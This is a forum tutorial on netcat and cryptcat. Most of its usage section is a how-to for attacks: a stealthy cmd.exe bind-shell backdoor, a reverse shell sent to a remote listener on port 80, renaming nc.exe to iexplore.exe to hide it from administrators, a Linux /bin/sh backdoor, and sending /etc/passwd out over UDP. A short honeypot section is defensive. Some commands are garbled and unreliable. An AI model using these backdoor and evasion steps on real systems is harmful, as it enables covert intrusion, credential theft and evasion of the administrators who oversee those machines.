Netcat Explained

NETCAT AND CRYPTCAT

This tutorial is a combination of different sources. I can not take credit for all the information I just compiled it and added my touch to it.

Disclaimer

For educational uses only. I do not condone any use of this tutorial for malicious behavior. Its simple. If its not your computer. Don't mess with it.

What is netcat?

Netcat is a computer networking service for reading from and writing network connections using TCP or UDP Netcat is designed to be a dependable "back-end" device that can be used candidly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation you would need and has a number of built-in capabilities.

Download

The official download website of Netcat for both Windows and Linux is http://www.downloadnetcat.com/. I am not going to go into depth on how to install. Basically if your running windows place nc.exe in system32 folder. If your running Linux you sudo apt-get install netcat (or whatever the command is for your version of Linux)or compile it yourself from the tarball.

Command Line

-d Puts netcat in stealth mode. Therefore it runs in the background. This command is only available on windows.
-e <command> If compiled into the GAPING_SECURITY_HOLE option, a listening netcat will execute <command> any time someone makes a connection on the port to which it is listening
-i <seconds> This is the delay interval. This is the amount of time netcat waits between data sends.
-g <route-list>Netcat supports loose source routing.
-G <hop-pointer> This option allows you to control which ip in your route-list the next hop.
-l This is listen mode.
-L This is a stronger listen mode only availiable in windows. It tells Netcat to restart its listen mode with the same command-line options after a connection is closed
-n Tells netcat not to do any hostname lookups.
-o <hexfile> Does a hex dump on the data and stores it in hexfile.
-p <port> Specifies the port
-r Netcatchooses random local and remote ports.
-sSpecifies the source ip adress netcat should use when making its connections.
-t If compiled with the telnet option netcat will be able to handle telnet negotiation with a telnet server.
-u Tells netcat to use UDP instead of TCP.
-v Verbose. Controls how much netcat will tell you what its doing.
-w <seconds> Controls how long netcat will wait before canceling connection.
-z Tells netcat to only send enough data to find which ports are listening in your specified range.

Usage

Netcat Backdoor Victim:

nc -L -d -p <port> -t -e cmd.exe

-L is the listening command. -d tells netcat not to open a window when running. -p assigns a port. -t is for telnet. -e activates cmd.exe when client connects to it


Client:

nc -v <ip address of victim>

note: In this example netcat runs in the background on the victims machine. A system admin may open task manager and see that nc.exe is running. A smart hacker would change nc.exe to something like iexplorer.exe or updatemanager.exe in order to avoid suspiscion. Now, if a system administrator runs a trusted netstat –a –n command at the DOS prompt, he or she might notice that something is running on a rather odd port, telnet to that port, and discover the trick. However, Windows uses several random ports for varying reasons and netstat output can be time consuming to parse, especially on systems
with a lot of activity. Hackers might try a different approach. If they've infiltrated a Citrix server, for example, accessed by several users who are surfing the Web, you'd expect to see a lot of Domain Name System (DNS) lookups and Web connections. Running netstat –a –n would reveal a load of outgoing TCP port 80 connections. Instead of having an instance of Netcat listening on the Windows box and waiting for connections, Netcat can pipe the input and output of the cmd.exe program to another Netcat instance listening on a remote box on port 80. On his end, the hacker would run:

nc –l –p 80

From the Windows box, the hacker could cleverly "hide" Netcat again and issue these commands:

mkdir C:\Windows\System32\Drivers\q
move nc.exe C:\Windows\System32\Drivers\q\iexplore.exe
cd Windows\System32\Drivers\q
WINDOWS\System32\DRIVERS\q>iexplore.exe
Cmd line: -d -e cmd.exe originix 80
WINDOWS\System32\DRIVERS\q> 

Now the listening Netcat should pick up the command shell from the Windows machine. This can do a better job of hiding a backdoor from a system administrator. At first glance, the connection will just look like Internet Explorer making a typical HTTP connection. Its only disadvantage for the hacker is that after terminating the shell, there's no way of restarting it on the Windows side.

Port Scanning Command:

nc -z -w2 <IP Address> 1-6000

-z tells netcat to run a port scan. -w2 tells netcat to wait for 2 seconds before disconnecting. 1-6000 are the ports to scan. If you want you can add -v or -vv to see more of what is going on making it:
nc -vv -z -w2 <IP Address> 1-6000

Banner Grabbing

Banner grabbing is a function that helps you see what is running behind a given port.

Command:

nc <IP Address> 80

Command:

GET HTTP
or
HEAD / HTTP/1.0

(Hit return twice)

File Transfer:

From system in which file is stored:

nc –l –u –p 55555 < file_we_want

Command of receiving system:

nc –u –targethost 55555 > copy_of_file

This can be used to grab the etc/passwd file. This can be done by utilizing the command

nc -l -u -p 55555 < /etc/passwd

Netcat does file transfer under the radar. It does not leave any logs whatsoever. Many other FTP do leave logs.

Setting a Trap

You could run a instance of netcat on a port a hacker may be expecting to find vulnerabilities. If your good you may be able to trap the hacker using something like command:

nc –l –v –e fakemail.pl –p 25 >> traplog.txt

Your fakemail script might echo some output to tell the world it's running a version of sendmail and practically beg a script kiddy to come hack it . Once he does you could flood him with what ever you want. If your nice you could just run a script to grab his IP.

Linux Backdoor

Most of this tutorial was built around hacking windows with netcat. However, the same can be done on a Linux system with the command:

nc –u –l –p 55555 –e /bin/sh nc

Create your own usage

There are several shell scripts and C programs that generate even more possible ways to utilize netcat. With a little understanding of computer programming you can create your own usage of netcat. I encourage you to try.

Cryptcat

Cryptcat is what is self explanatory. It is an encrypted version of netcat. It uses an enhanced version of twofish encryption to keep netcat traffic hidden.


You might argue that netcat is a glorified telnet. Well it is. However it has far more capabilities. Netcat is my favorite tool because of its simplicity. It is easily compiled into scripts or code. You may say "Abstrakt, are you an idiot? There are programs such as meterpreter that can be used as backdoors that are far more easier." To this I say yes I am an idiot, but netcat is much more than just a backdoor. You may also say "Abstrakt, you are an idiot. How do you get a copy of nc.exe into the system32 folder without having access to the computer?" Again I agree I am an idiot but I encourage you to learn to program in C or write scripts in perl and find a way to compile nc.exe into a code or script. It is a great tool to have in your arsenal even if you are a meterpreter fan. There are many other uses of netcat than what I explained. I encourage you to look further into it. Also this is my first post on intern0t. All criticism is welcome and preferred. I plan to create more advanced netcat tutorials in the future going further in depth with each usage.